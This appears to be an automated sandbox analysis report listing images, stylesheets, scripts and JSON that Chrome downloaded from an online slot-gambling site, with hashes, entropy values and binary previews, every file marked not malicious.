                                                      • Report size getting too big, too many NtSetInformationFile calls found.
                                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                      • VT rate limit hit for: https://b45032.com/
                                                      No simulations
                                                      No context
                                                      No context
                                                      No context
                                                      No context
                                                      No context
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, comment: "CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), default quality", baseline, precision 8, 84x23, components 3
                                                      Category:downloaded
                                                      Size (bytes):1154
                                                      Entropy (8bit):7.462189069615817
                                                      Encrypted:false
                                                      SSDEEP:24:O7A+di9YMWQo0XxDuLHeOWXG4OZ7DAJuLHenX3YSXO2+LPfAd+Ja/T513:GAmi9YMSuERA+EOdLnW+k/dp
                                                      MD5:79E10E2C746DC4235797D4CAEC14B6D5
                                                      SHA1:8F3EBD8EE436A01AD107D73FEA52E75403C91F85
                                                      SHA-256:94312664736804B8E136136A55D983A6F11C36FA922F713A7D4442F7016D0CE3
                                                      SHA-512:8EC2D6E154CE1977582926B36800579587BFBF7938946F074EA818170EE9008BD72ADB8BB95D5021FEA2D04E0E9B74C47C8B3A29220A6277938A51B26A86F2A0
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://b45032.com/gdcode_1736725694
                                                      Preview:......JFIF.....`.`.....>CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), default quality....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222........T.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?....FX..9.l..C...X.X.+....o.ZB.|....gu.......'..8....t..)SR].O.r.vf|Z....%c6.@Ll..~.....s..5.\t.\....tS.......rf.fwR...0....k...5....B.3.q3.M+.....:.ocw...&.s<c9.........=.WN.k.$....fV@s.....Z.. ...B..u0...O...5.H.....G........y..-......s.......[G.\M.Q...`..4.u....V...A..~,#.]KQ.H-.-.#...8_S.?Jo..e
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 280 x 280, 8-bit colormap, non-interlaced
                                                      Category:downloaded
                                                      Size (bytes):6122
                                                      Entropy (8bit):7.9079178522274445
                                                      Encrypted:false
                                                      SSDEEP:96:7JMDudptzltyUUThLs6wkrOwZeDeG14tLw/fxoikZ+/DU78DWjS3hZyErMi:Dzwts6wOZuHuU/f1++/8GBnIi
                                                      MD5:890C9A5BEC36C9044A195AE6C12626E7
                                                      SHA1:725B0DB0DA614042A73B486B8DE56B9E20DECC81
                                                      SHA-256:48EA55ED828936524AB8F95C5B59E3EF3732DBEE70995808ED1AAE0FD75FA1AD
                                                      SHA-512:38AD120712ACBA2E52B92CEA45CCF8FB5BBEC308FA2973751886A0D269CC65196176943015C889B558F5A4E55814FB0B97B7680C3897C89F425FF3CD655BD319
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://5getfab.segrft.com/images_plus/egame/nav/173_egame_logo.png?ver=1698829779
                                                      Preview:.PNG........IHDR..............P......gAMA......a.....sRGB.........PLTE......y..{..{...........v.......................~......f....~.................`....Z..|.......q..t..b..d.........f..c..e..Z....t..|....t..y....a....\..\..c..........S..v.............u...................q..f.....................n..D..@..:..@.............z..X....s..+............n~...}..~..{..{....r....s..m..k..\..j..g..v..y....n..b..e..x..h..p..|....x..a...._..d..t......M...........~....w..=..W..Y....u..V..Z..u..H..|......T......P..M....S....`..-..U..A...."..o....c..Q.........P..m..S.......W..6.........J..3........c........[..q..K..Y..I.....j.......g.....].....*..'......C..E.....e...........u.......9..:...}..........1........u.....C..'.. |.........:..M....0..5....eS...ktRNS.$.0..8.......fE..\@R.,..y.rO.....?.r.h.z.. .Q.).4..}@....a.......a..X.........bn..........y........|....IDATx..y\.g......>..RAP..A.(...#.
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 200 x 200, 8-bit colormap, non-interlaced
                                                      Category:downloaded
                                                      Size (bytes):29661
                                                      Entropy (8bit):7.990566333693079
                                                      Encrypted:true
                                                      SSDEEP:768:v6vaPjM30l1WGJi3DqwyCW3EIe/PZL8li15YkG773:v6vqQi1WOi0y/PZAnkS
                                                      MD5:5C625B0DBD0F11C99B1E15F0AF92C022
                                                      SHA1:04EC60F16EE4D304B4CC0F4F7D13C814C349EBFB
                                                      SHA-256:61CDC6E42281928A272380CA24ABECD085E40B5E930042F9C9B9C2B6F28FEE9F
                                                      SHA-512:82F3DF7918E763EA0E8A75631467CE564E304FF258601517C89627234C51E6082416AB57BBE8E972A0E873488625B00850D98F795FB64A4866F8313AF796ABBA
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://5getfab.segrft.com/common/storage/game/egame/joker/86burqb38a9ua.png?ver=1673334590
                                                      Preview:.PNG........IHDR...............^.....PLTE...987...C$.,.....CBA*)) ..S&.`_^`*.TSR...$""...2107)$9..L..stsA..NKIi1.O.&mkh8..A0'.=.....E.@%z||Y2).9"...G8/...t4"~3./".......S+.....B.>&r+.....6....^1.......E(...p_P~I9....S-hrub:+.I+.hNm92O@9..bhk.t_.L3.q<.<............5 .U....}hbTI..{zhZ[K@..{nF7|?*...F$Y...i..b6.vp.c..V.C.G1.W2.&#.rU..L.PB.....l.g/z--..Y^g.".i....q..p_..qRG.wAK...VE.>.<...b.......t.j8.12.{.t..~\H\@6u[.....cQi)..cK..qFGR;@J...............|py..t5....fPA#8...*)...3....V"....>!......8....F.>jG.KRa.V..K.G"{...B..Z.21cT-.d.......y=.m....r[.P.h6............rX|q...z..+1=..........b....w0.s.P.....J.1..$..........@...c.a2..x..s.XE....._g.....^........K.|:......93....T..B.............d.yf..c..c..].m..a.$..p.IDATx.d..O.d...{+...Lp.1....i.5M..c".Nz..T.5Sv......W$..C4J........n...q..c..z.#.h.o..<s..O......|./%.....+O.T.Y%.h..2.(.L...e..L.I-c.Z.di..:!D.d...."tC..5]a.._.66,K.,m..^..x1..|.e..E.Y...{.Zfgzz{...~...j...l...U]i.Z:n..Rv
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 700 x 255, 8-bit colormap, non-interlaced
                                                      Category:dropped
                                                      Size (bytes):74996
                                                      Entropy (8bit):7.975613848746688
                                                      Encrypted:false
                                                      SSDEEP:1536:3AFX09Ube/vaJq9ouxBgbHK9buSiHTGhVeULLs2gX:QK9Usio9o2P9IHixEX
                                                      MD5:2928F4758954C352F4399AE51910AAE4
                                                      SHA1:54BD713892830CFFA4F2ABC335C7C6425946C843
                                                      SHA-256:BC1789B0C98D45AFAFE4DE82829720F6A6681334635D0B6027059C8F178F2ACD
                                                      SHA-512:DD1C907A3139FF022E308A654F5FE91EBCD0EDCCA12F6814BED6DEC7650792CCB6843EC6E7B26EC262C6031263C467AFA82E3F295DB6B83AB9A2B14A6D4838DC
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:.PNG........IHDR.............$7......PLTE.....................$..)......../..5..C....v<..g.....g..$..P..W.....,..I..o.....<..^.....j..q..7..`..x.....U..s..4..!..@..J..{"..........'&......&$(..H!.z..0$.7+90#1..#.!.)&.!.>1B......`............72.&#..~...d,$.0+. .U1(..(..+R#..,+.:);#.*.)\;5;/.5-,7*.G;>.qC(..q."['.E9MMAXRGcH+%G8.kD6|.'.5+..g=%.%..Y;NB/B40s9/.:4QCG}I4.71.F=[N7|WDH..V>.cAE.2...R[MR.NCA5......nP@.A8...C:..z.F5^Sp.cWP+..s|vch[y.L).jfZC.PN..t..L....\.cO...2....pSQ{\\.]:.,..SK.tinb.vFE....Y;]Oe.@!.M+. ....jY....cZ.....wic\....vf....r.XJ.+..{.hl.YD...........).xx.^...iI....4)~E"pZ#.dX.vJ...vb..V.sRwhD.J7.sd..~....bJ.^f-..........93...F(.<.ulr.R..uG.....v].e5.($.l.J._M...b...b.o7zm..n.d5.u..`.....L:3.#..?.Z&...n......l.O.].....|H.....w...(..\....D.........o|....!.IDATx...O#U....c...C.-....$@Y...J..@..].@..."-Eh.D.c...Dn...M.w.c.!^...Wz.1&....>.y...l......ygZ.!..O.s....U.|..u.....!...D<>1TWWw........p8..r.............y({.........f.Aah.
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, comment: "CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), default quality", baseline, precision 8, 56x23, components 3
                                                      Category:dropped
                                                      Size (bytes):1046
                                                      Entropy (8bit):7.3681447333978
                                                      Encrypted:false
                                                      SSDEEP:24:O7A+di9YMWn0o0XxDuLHeOWXG4OZ7DAJuLHenX31I075JAo1Ko:GAmi9YM+uERA/VB
                                                      MD5:E50D5E3493BCF2F07F29783F943A8E5F
                                                      SHA1:46204C05F802CB6FF5CE71072BA9D9E3C0DDCE17
                                                      SHA-256:163376CD27B215E837B8B2E0E861072253272F9BD0F3F15902DF56C13C08E052
                                                      SHA-512:53B4FF8C4C6B6A88DBE1C71B9CD33C9F1D5E27970D6FF221845418FF88294CE57F8ACC017D2F58F08A2E274E248C852E487EC182476A6C8B35A41BA75730E65B
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:......JFIF.....`.`.....>CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), default quality....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222........8.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..}cZ...m>..B.M2$.;Wy*.Os..o.+...v.L.3|.w....m.....lXj.jV.}.m.......Er5.g}H/c..m..i...)^'.3.".W..#.nH..5MBy..............G.tg...Oj..f...t._..^.=....{V>....Mk..wj..Iu E.S..7);...GL....F...]i.l....@.5W(.N<.#g..9\V.r~...w.mnlc'..h..N..|8....WS....sD..C+....k.[t9Er.!.QE#0.'..w..R`0%..`=3.g...j(....k....
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:gzip compressed data, from Unix, original size modulo 2^32 6749
                                                      Category:downloaded
                                                      Size (bytes):2034
                                                      Entropy (8bit):7.911271337905335
                                                      Encrypted:false
                                                      SSDEEP:48:X3jcqpkfvIXTUbKlEVL8GQkymOtKQuYpzy0w27D3Kmz/Yvs7xVt:HZ2vIX7cL1atwQlBdzKUwvaVt
                                                      MD5:DA027701BE3CAA151CA1057A6A513253
                                                      SHA1:A4D914808712A99DDFBC1BEF35B6096F00B250DB
                                                      SHA-256:BE4C07326EAC17D67161AEC578DC50A36019F3BEF0545F007CDBC63E9AEDE7DA
                                                      SHA-512:236176F1623474C65B665562778BD56CC5192B036AB44E8E6BD19B01C088F3A22292F2126E2022C903B9FCF9928038D7DCD5C28050B190BB4E01A66C35F60C8D
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://5getfab.segrft.com/plus/css/common/index.css?ver=1700473959
                                                      Preview:...........X.n.6.....j.H..d.v\`X.......h.... .I...e...{...<..%.K..-.#....~..=....)..a..8.m.z..b#.O_...\."....jq,.5....6.%......c.]U..k-.Z....l.W.f..2xzM@......U..{.....A.?.5.............!{.w{.&.H]..D..:(...@%.(xN&IJ..w.F..6BJq8}.c}..\..Q.OW7W.......9g..Lnr..*......_j.e...(..d...$.b......q..1]....I...M./.$.`F.^. ......hib..*.5..".G.3Q.zM..\2.t...(bE..5I!J......w.\.Pi..!m...r.&7.pp...m.?B..g[...RyE...4ZY)V.......lX.....Sg.W..!.X@..l/.X.;+Xfl3Q.......UC..x..FeR.4......\.=.sV.p.#N,E.'... ....H..."...Uz{...I.^...nLKQ....r...J.@c{..m......bJ>..I..)ih.....v<2k../=...c.M....r......q...z..y.o......H.J...(.L.X..`.......%...HQy.2..,.+]8t..4,.l?;.|.....^q....94.t]k.F<)?..'.U........aW..t.{.2...v.yno.t.T5.f...4tSeg...w.3...-K.\....\....D.0..$.5....M...... .UsU....D.Lv...Y%8....'K..0..g4]......L.....X.-......tI... ....Udf.h.z.F.;NZm...k....<.q......L.`....".7.S..>..@... SV.H...[..E...'k.i..Z........[.&.M%j.x......7z].#..c.....N...z...l....>
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:GIF image data, version 89a, 1 x 1
                                                      Category:dropped
                                                      Size (bytes):43
                                                      Entropy (8bit):3.0950611313667666
                                                      Encrypted:false
                                                      SSDEEP:3:CUMllRPQEsJ9pse:Gl3QEsJLse
                                                      MD5:AD4B0F606E0F8465BC4C4C170B37E1A3
                                                      SHA1:50B30FD5F87C85FE5CBA2635CB83316CA71250D7
                                                      SHA-256:CF4724B2F736ED1A0AE6BC28F1EAD963D9CD2C1FD87B6EF32E7799FC1C5C8BDA
                                                      SHA-512:EBFE0C0DF4BCC167D5CB6EBDD379F9083DF62BEF63A23818E1C6ADF0F64B65467EA58B7CD4D03CF0A1B1A2B07FB7B969BF35F25F1F8538CC65CF3EEBDF8A0910
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:GIF89a.............!.......,...........L..;
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (32025)
                                                      Category:dropped
                                                      Size (bytes):84345
                                                      Entropy (8bit):5.366447824180109
                                                      Encrypted:false
                                                      SSDEEP:1536:/P10iSi65U/dXXeyhzeBuG+HYE0mdkuJO1z6Oy4sh3J1A72BjmN7TwpDKba98HrJ:++414Jiz6fh6lTqya98HrJ
                                                      MD5:F9C7AFD05729F10F55B689F36BB20172
                                                      SHA1:43DC554608DF885A59DDEECE1598C6ACE434D747
                                                      SHA-256:F16AB224BB962910558715C82F58C10C3ED20F153DDFAA199029F141B5B0255C
                                                      SHA-512:3DCAE1FF6E98C64E3586BE3EB14DD486C51F7D4E9FA1B8F9A628BE4FBB6A9AB562F31F9B50E16D2E0C72B942BDBE84EEE8E0EF87FA730DB1428B199A59D88232
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:/*! jQuery v2.1.4 | (c) 2005, 2015 jQuery Foundation, Inc. | jquery.org/license */.!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){var c=[],d=c.slice,e=c.concat,f=c.push,g=c.indexOf,h={},i=h.toString,j=h.hasOwnProperty,k={},l=a.document,m="2.1.4",n=function(a,b){return new n.fn.init(a,b)},o=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,p=/^-ms-/,q=/-([\da-z])/gi,r=function(a,b){return b.toUpperCase()};n.fn=n.prototype={jquery:m,constructor:n,selector:"",length:0,toArray:function(){return d.call(this)},get:function(a){return null!=a?0>a?this[a+this.length]:this[a]:d.call(this)},pushStack:function(a){var b=n.merge(this.constructor(),a);return b.prevObject=this,b.context=this.context,b},each:function(a,b){return n.each(this,a,b)},map:function(a){return this.pushStack(n.map(this,functi
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 225 x 52, 8-bit colormap, non-interlaced
                                                      Category:downloaded
                                                      Size (bytes):3188
                                                      Entropy (8bit):7.823072217149618
                                                      Encrypted:false
                                                      SSDEEP:96:U4aXyVDtDCgdpI5FVmM2gH5gCMP0H1OcWdLFehW40FP:MYBDCgQVpdHmCH4lycP
                                                      MD5:C1F5E5FC61AE482E09C8F1DDC42A3D9D
                                                      SHA1:2D32AAF779F25618E328412C7A6AA735B7D442EE
                                                      SHA-256:46666FAF5F66D6F10307F942D4382A11DFD3309990807BF178523CF5293F22FC
                                                      SHA-512:0F7282962A87D1F5CE7B437EE10C9FD2EF13FB5D87212872FE6EE2DA1DF586E1BA83E64584116CE93666B6BF8BD35127C63F775847FC85A49B3C3E6B5FA7462C
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://5getfab.segrft.com/images_plus/egame/nav/202_egame_icon.png?1736725718963
                                                      Preview:.PNG........IHDR.......4.....K.......gAMA......a.....sRGB.........PLTE............666......................./...te........r.:8....STU.........na.$%&...j^.OG.1-.dX....c[... ..'........ ...^S.qd.mnn%".uxxFFG......}m..........{|....PPQg\....61.[]]......fgh...wj.............@@@888()+)(*CDD.....$...../:3.ccdGGG...hhi?7.>>>..'...455HB.!!".."KLP......YP.......TK.rrt.z"*'.......IJJOL.QN.......gggjjl)$...&BBB000.(.243......***...23<&')667{||YY[677F=.......KKL...UUVrrr?@@..3ttt555.,.%$.&&........./../.x.../..-.....;.......*..-.....2.....5....*....*..9.1../..,../.....;..........,..D..;.........u.....+..7.....9..:..5..'........G........7.(....,........,..8../././.......<..=..........?..E..2..3..3..@.....L..I.0.3..9..1.0.....6.~...4..............6....0..4.....:..3.;..9.?.....B...../z}}%....CE=..7..D...I@...+..5..C..C..C..N.....tRNS..I.....A.....A..............................O....o2............e;...........'Xs..........".:..w........!.........S.*...&....4:.RS..C................
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:gzip compressed data, from Unix, original size modulo 2^32 170
                                                      Category:downloaded
                                                      Size (bytes):155
                                                      Entropy (8bit):6.1043637024175865
                                                      Encrypted:false
                                                      SSDEEP:3:FttLqqp2gJyDgI3RNsJZsfs0A3GlwLWnyCsN4qFLPlQ1Fb20ortn1Ifw1/hPl/:XtLqS2UoNqsM3GUgylNnxd+F8rtIwR
                                                      MD5:0CCD3356A030CF6393CD331E03AE7B10
                                                      SHA1:75633B8377FFEEB5D3DD8BE7E810105EFDB0A497
                                                      SHA-256:116724700927DDB97E92DEF7384B3E12D4B9BC7DDEF026D6DF4ACDD478D98CEA
                                                      SHA-512:24A800569EDEE22AE7F5D96E32B90BBE9397904B701AFC4875F5342C60E42A0A5F4FAE193ABB4651002C7F562C69DD684819E3C7E44CCB290020E06347B7904D
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://5getfab.segrft.com/plus/css/unite/login_unite.css?ver=1614680240
                                                      Preview:.............O.....OI..M.O.T.K/./-..ILJ...L.,..I..R...K......../..,I.O../I-B.g....dW.5._..y..QK.K..<5.D71'..D!-35'.8.D.N!3...D.hDr~N~.............l....
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:gzip compressed data, from Unix, original size modulo 2^32 187466
                                                      Category:downloaded
                                                      Size (bytes):29975
                                                      Entropy (8bit):7.989825140879538
                                                      Encrypted:false
                                                      SSDEEP:768:O5srlkCvdcnricyWOwql55BZR/KvON4pIbpScxoQaJu:T/7cB7M5nZRivzepHd3
                                                      MD5:39D3FAFAD246EBC5AF971FC3AAA5B751
                                                      SHA1:859FF4713C5F48CE54B3D32C595C6D224B0AD2E0
                                                      SHA-256:DF84DD954A6F604032EFD4FF20D07129749432FB66EA562067CF11B28951A9B2
                                                      SHA-512:449845ABE554D2C0BCD022C25272FEDFC90B904967CBB53C0AE49D98EB08DB0E6CFD342E35BB3CF532DCF2883D55A5E2A20ABDD0A02BD918AD842A63E9EAC0C1
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://b45032.com/plus/plugin/css/to_bootstrap.css?ver=1606790105
                                                      Preview:...........k.#. .}...1U.t...N2.9h....F..v.X..7...$UL.".....~.n..{0.Z3..ZR.....f...v.6..N...7_...i..~.7...i.O.....r|.[.N...~x.N.2........9..W.fz1....n....>......m...y.=v..y......._....].V.3.........f7..=......~......w...Do........n<?....b|....=...s.o..n.....~#.....0....q@..z..auz.\.f...;.7..H<..?..@.zk.b.o..E..v._o.......&M...(.4......{.1..z...i.l../....G..^.....S7..>.N.........?=.O.....o...Q..u;.-.`.O..q.}h..K.=...M.>..=.....7..r.8o...n...|.1-.D...nW].....x.=.......s.....v..I...O 2..b}.+.}.!.?$%..X."..v.....?....1....C}I...f..F.s.|.......4:k..i.......4..;.6...:..,l.:......Z/.....S.d=(.565l7k...:...x....@........<..............OF....lv..>m...........{.'..n...."E.,b...n....[."..v.$..r.>..l.....9O...`k....m.d=.il.&D<4..)..P...$....x......h....p.x.F,...F.H...p.)..w.q....A...Z"..n.1.YCw.p......n.....i...(..;4.*m.O..5.......=. .....\nv. .Y.I.."&.E_..P....s......g...I........I`...d..././j..[..=...>.v)..D..0[D..8.......3.v....y.....<:..BL.
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:Unicode text, UTF-8 text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):15380
                                                      Entropy (8bit):4.6621101956404285
                                                      Encrypted:false
                                                      SSDEEP:96:ZRORCQC5WCQCD9CQCwCGCkCmCQC+MiCwCdCuuCkCbmCd9P/ddPojcHoujp1SPZaQ:ZR0RvJdlANu91diXdT59j6IQNHYerS
                                                      MD5:DDC9CAC97E3733C0B8340431BF4E5956
                                                      SHA1:D2101A520D73BD74861323CE59225DE62F5BB5F2
                                                      SHA-256:0EED38BD8F94BC8791459CA259B1F87F0B4EC0F1E1D8EC4A6D7BD213ED1CEC05
                                                      SHA-512:532CA113E03EFE2D00EAC3ED06B379DE6C76432F2A3A9D38A3EA682F5FA8F96F472EBEAE2B68A1E5145F2A825DAD39DDA0FEFD0E51CC67609D8E150E1CFD39A8
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:var b = false;..$(function() {.. $("#userid").blur(function() {.. checkUseName($(this));.. });.. var checkUseName = function(obj) {.. var username = $.trim(obj.val());.. if (!/^([0-9](?=[0-9]*?[a-zA-z])\w{4,12})|([a-zA-Z](?=[a-zA-Z]*?[0-9])\w{4,12})$/.test(username)) {.. obj.siblings("h4").show().html('.....');.. obj.parent().find("img").show().attr("src", "images/red_icon.png");.. b = false;.. } else {.. obj.siblings("h4").hide();.. obj.parent().find("img").show().attr("src", "images/g_icon.png");.. b = true;.. }.. }.. $("#password1").blur(function() {.. checkPassword($(this));.. });.. var checkrealname = function(obj) {.. var checkrealname = $.trim(obj.val());.. var reg1 = /^[\u4e00-\u9fa5]{2,4}$/;.. if (!reg1.test(checkrealname)) {.. obj.siblings("h4").show().html('.....');.. obj.parent().find(
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:Unicode text, UTF-8 text
                                                      Category:downloaded
                                                      Size (bytes):1933
                                                      Entropy (8bit):5.187294989277712
                                                      Encrypted:false
                                                      SSDEEP:48:c8zw3d4TZPZtFOWDERjeJFmgZRL0KtTL2oMBCm7:fYRjYEK0KtWtBCO
                                                      MD5:6A579F2E4D3B31B3EA017E7B03A475DD
                                                      SHA1:8D9A6430FACE051AE1365D421F15C60CFF36613C
                                                      SHA-256:CA0D1288490DAB47EB98606D7E519B4BE96E1D5F354B8CF4A6EF39DD1846C41C
                                                      SHA-512:E5C65863509FB786D1A2AC8A1C0E0EC1446158037079A067EB6976040A0D912E326C2254E7968A7E22AE794D3ADAD6B9BFCCBD2A4EB35DAD622676D3A989D742
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://5getfab.segrft.com/plus/js/custom/main.js?ver=1606790105
                                                      Preview:$(function(){..location.hash.split('#').pop()=='yzmError' && swal('............'),location.hash='' . || location.hash.split('#').pop()=='loginError' && swal('............'),location.hash='';.});..function tanchu(chaunti) {. guanbi();. $("body").append("<div class='baibg' onclick='guanbi()'></div>").addClass("ovn");. $(chaunti).show(0, function() {. $(chaunti).css({. "top": ($(window).height() - $(chaunti).height()) / 2,. "left": ($(window).width() - $(chaunti).width()) / 2. });. });.};..function guanbi() {. $(".tanchu,.denglu_tc,.qdhb").hide(0, function() {. $(".baibg").remove();. $("body").removeClass("ovn");. });.};.$(function() {. $(".js-guanbi,.baibg,.icon-close,.qdhb-close").on("click", function() {. guanbi(). });.});..$(function() {. $(".js-zcrs").each(function() {. var datanum = eval('(' + $(this).attr("data") + ')');. var x = parse
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:JSON data
                                                      Category:dropped
                                                      Size (bytes):3433
                                                      Entropy (8bit):5.027448140828748
                                                      Encrypted:false
                                                      SSDEEP:96:6muOBOhjag3VP7QR+VBfEO6NodGQhlYxBrj:6muOBOhjt3VzQkVBfEO6NodGQ0Hv
                                                      MD5:108DE3688348603249E2EF4FF76E683A
                                                      SHA1:00578BE1BC0CF509E92C1F426912220B1A50112D
                                                      SHA-256:AAAFD6456F786EDC4C5E15B241494B7695C81D1D23DB593950485F9F3D47A697
                                                      SHA-512:BCE8325D4B7E47D88080428FEEE8F569384B4BF64E315C9D17AF3FF151D7FB1F8331FC2922EE9442436B202237BF1D0E377FFAB2E523F8D7783590ED7184763E
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:{"gamelist":{"current_page":1,"data":[{"id":38229,"name":"Treasure Bowls","pfid":224,"ppname":"UPG Slot","code":"UPG","img":"\/\/5getfab.segrft.com\/common\/storage\/game\/egame\/upg\/UPG_TreasureBowls.png?ver=1728355170","progressive":"","ppid":224,"notry":1,"favorite":false},{"id":38228,"name":"FaFa Fortune","pfid":224,"ppname":"UPG Slot","code":"UPG","img":"\/\/5getfab.segrft.com\/common\/storage\/game\/egame\/upg\/UPG_FaFaFortune.png?ver=1728355170","progressive":"","ppid":224,"notry":1,"favorite":false},{"id":35972,"name":"Wonder Woods","pfid":224,"ppname":"UPG Slot","code":"UPG","img":"\/\/5getfab.segrft.com\/common\/storage\/game\/egame\/upg\/UPG_wonderWoods.png?ver=1712128601","progressive":"","ppid":224,"notry":0,"favorite":false},{"id":35971,"name":"Treasure Skyland","pfid":224,"ppname":"UPG Slot","code":"UPG","img":"\/\/5getfab.segrft.com\/common\/storage\/game\/egame\/upg\/UPG_treasureSkyland.png?ver=1712128601","progressive":"","ppid":224,"notry":0,"favorite":false},{"id":
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 200 x 200, 8-bit/color RGBA, non-interlaced
                                                      Category:dropped
                                                      Size (bytes):89883
                                                      Entropy (8bit):7.989393627439856
                                                      Encrypted:false
                                                      SSDEEP:1536:XkOCsrftG/NW/MXNIwszC/yB9wCPpUV0CsbRfqyghEByMIUlza9KsVXSWGSxfJxT:Lt/wNI1zCQ9SMJza9ewfJx9ECwYkYC6
                                                      MD5:6BE7795EF3B5BF21EE7C1FCF344BA626
                                                      SHA1:E0B15BEAA56769422C512C4F411413D28EAA5CCD
                                                      SHA-256:AC68309DD8B316760BCD2CFFB7B3C3063A958F061BC83DF6E1A1ADF4805C8B0C
                                                      SHA-512:B9013318CC91EBED1F13ABFA5E07C10DE73B1BE0D175FFA07DA3468D31F7E6270747EAF0AD3D0800246355ED9A3B27EE89AB3987840DEB8857AF4A36D45B5278
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:.PNG........IHDR..............X......zTXtRaw profile type iptc..x.M.;..0.C...#.i........@...0..)...[.a..:.m_.yEHlM-..+S.s..!..,{...(|v.."L.."WX.T...JE.'*k....R/7..$. ..c..."iTXtXML:com.adobe.xmp.....<?xpacket begin='.' id='W5M0MpCehiHzreSzNTczkc9d'?>.<x:xmpmeta xmlns:x='adobe:ns:meta/' x:xmptk='Image::ExifTool 11.70'>.<rdf:RDF xmlns:rdf='http://www.w3.org/1999/02/22-rdf-syntax-ns#'>.. <rdf:Description rdf:about=''. xmlns:dc='http://purl.org/dc/elements/1.1/'>. <dc:subject>. <rdf:Bag>. <rdf:li>Icon</rdf:li>. <rdf:li> mgp</rdf:li>. <rdf:li> upg</rdf:li>. <rdf:li> Human</rdf:li>. <rdf:li> Person</rdf:li>. </rdf:Bag>. </dc:subject>. </rdf:Description>.</rdf:RDF>.</x:xmpmeta>.<?xpacket end='r'?>..=... .IDATx.....e.y.......qr..3..D0. .A.$%*..$Y..k.{...k...e..-.v..G.L[.H{E..e."a......0...{f.{:w.x..S...z0............K...}%Fj.h.....'.@+.F..u..5e?c.. ..B.......[J.h..w.y.~G .@..Z....t...s.w..............e).}..%..5wN.Kw..5....1.y+D).2..F......(.<@.6...9...$G..E
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 200 x 200, 8-bit colormap, non-interlaced
                                                      Category:dropped
                                                      Size (bytes):30946
                                                      Entropy (8bit):7.990014219708387
                                                      Encrypted:true
                                                      SSDEEP:768:60A+SuvH52/HQI5XCc/d087817+GQrPlLyP3aAbjEojX:i4vH52PQuXCC087i+fAfjX
                                                      MD5:A1D14538935AC159D1709A9C843766D0
                                                      SHA1:831CC10C99A5A0C7ECF90F2655365A97EA80C838
                                                      SHA-256:54C6DBF199652F8B87F736EFEF104D89037B90A295D70C117E1D1988FC7809F0
                                                      SHA-512:9FFC792E2DFECB4237467153B22BBFB24551F48A7F3D3912618B4C797817D019A9D9CDE5ED65F6479765989AEFC07654561B1DC8EE0902330ECEE7BD0C0AE859
                                                      Malicious:false
                                                      Reputation:low
